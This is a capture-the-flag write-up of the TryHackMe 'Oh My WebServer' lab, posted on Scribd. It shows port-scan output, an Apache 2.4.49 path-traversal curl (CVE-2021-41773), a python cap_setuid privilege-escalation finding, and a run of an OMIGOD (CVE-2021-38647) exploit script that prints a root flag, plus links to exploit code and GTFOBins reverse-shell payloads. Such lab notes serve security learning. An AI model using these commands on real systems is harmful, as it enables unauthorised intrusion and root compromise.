Scribd
Upload
27 views4 pages

Oh_My_WebServer

The document details a security scan of a web server at IP address 10.10.195.101 using RustScan, revealing open ports for SSH and HTTP services. It includes initial access attempts via HTTP TRACE and privilege escalation checks, identifying a Python executable with elevated capabilities. Additionally, it provides references to exploits and tools for further enumeration and exploitation of vulnerabilities found in the server.

Uploaded by

repilex959
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
27 views4 pages

Oh_My_WebServer

The document details a security scan of a web server at IP address 10.10.195.101 using RustScan, revealing open ports for SSH and HTTP services. It includes initial access attempts via HTTP TRACE and privilege escalation checks, identifying a Python executable with elevated capabilities. Additionally, it provides references to exploits and tools for further enumeration and exploitation of vulnerabilities found in the server.

Uploaded by

repilex959
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

Oh My WebServer

Initial Scan
root@ip-10-10-4-90:~# rustscan -a 10.10.195.101 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time \u231b

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"


[~] File limit higher than batch size. Can increase speed by increasing batch size
Open 10.10.195.101:22
Open 10.10.195.101:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

PORT STATE SERVICE REASON VERSION


22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; p
80/tcp open http syn-ack Apache httpd 2.4.49 ((Unix))
|_http-favicon: Unknown favicon MD5: 02FD5D10B62C7BC5AD03F8B0F105323C
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)

Oh My WebServer 1
|_http-title: Consult - Business Consultancy Agency Template | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access

🚨
root@ip-10-10-4-90:~# curl -X TRACE -H "X-Header: Attila21" 10.10.195.101
TRACE / HTTP/1.1
Host: 10.10.195.101
User-Agent: curl/7.58.0
Accept: */*
X-Header: Attila21

root@ip-10-10-4-90:~#

curl 'http://10.10.195.101/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%

Privilege Escalation

🚨
daemon@4a70924bafa0:/dev/shm$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep

Futher Ennumeration

Oh My WebServer 2
🚨
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 9134 bytes 2365947 (2.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9683 bytes 10622282 (10.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536


inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

python3 exp.py -t 172.17.0.1 -c 'whoami;pwd;id;hostname;uname -a;cat /root/root


id
root
/var/opt/microsoft/scx/tmp
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Linux ubuntu 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021
THM{7f147ef1f36da9ae29529890a1b6011f}

Creds
Services User names Passwords

Oh My WebServer 3
Services User names Passwords

Exploits links
https://github.com/AlteredSecurity/CVE-2021-38647

python | GTFOBins
The payloads are compatible with both Python version 2 and 3. It can be used to break out from
restricted environments by spawning an interactive system shell. It can send back a reverse shell to a
listening attacker to open a remote network access. Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on
https://gtfobins.github.io/gtfobins/python/#capabilities

https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-
server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013

Oh My WebServer 4

You might also like